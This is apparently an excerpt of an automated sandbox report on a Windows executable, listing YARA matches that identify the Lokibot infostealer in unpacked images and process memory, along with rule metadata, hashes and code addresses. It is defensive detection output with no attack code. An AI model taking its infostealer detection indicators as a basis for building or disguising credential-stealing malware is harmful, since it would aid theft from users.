                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_0284D63C0_2_0284D63C
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_04FB6CE80_2_04FB6CE8
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_04FB00400_2_04FB0040
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_04FB001E0_2_04FB001E
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_04FB6CE10_2_04FB6CE1
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_0720C6D80_2_0720C6D8
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_07206E080_2_07206E08
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_07204EC00_2_07204EC0
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_072065880_2_07206588
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_072065980_2_07206598
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_072052E80_2_072052E8
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_072052F80_2_072052F8
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 0_2_072069D00_2_072069D0
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_00B4D63C8_2_00B4D63C
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1D7088_2_06E1D708
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1DC288_2_06E1DC28
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1AA608_2_06E1AA60
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1D6FB8_2_06E1D6FB
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1A7C88_2_06E1A7C8
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1A7B88_2_06E1A7B8
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1DCFE8_2_06E1DCFE
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1DC1B8_2_06E1DC1B
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_06E1AA4F8_2_06E1AA4F
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_0810B9908_2_0810B990
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_081069D08_2_081069D0
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_081052F88_2_081052F8
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_081052E88_2_081052E8
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_081065988_2_08106598
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_08106E088_2_08106E08
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 8_2_08104EC08_2_08104EC0
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 12_2_0040549C12_2_0040549C
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 12_2_004029D412_2_004029D4
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: String function: 0041219C appears 45 times
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: String function: 00405B6F appears 42 times
                      Source: FVR-N2411-07396.exe, 00000000.00000002.2051846710.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FVR-N2411-07396.exe
                      Source: FVR-N2411-07396.exe, 00000000.00000000.2006719176.0000000000726000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameyRKC.exe4 vs FVR-N2411-07396.exe
                      Source: FVR-N2411-07396.exe, 00000000.00000002.2072739008.00000000089E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs FVR-N2411-07396.exe
                      Source: FVR-N2411-07396.exe, 00000000.00000002.2053905676.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs FVR-N2411-07396.exe
                      Source: FVR-N2411-07396.exe, 00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs FVR-N2411-07396.exe
                      Source: FVR-N2411-07396.exe, 00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs FVR-N2411-07396.exe
                      Source: FVR-N2411-07396.exeBinary or memory string: OriginalFilenameyRKC.exe4 vs FVR-N2411-07396.exe
                      Source: FVR-N2411-07396.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
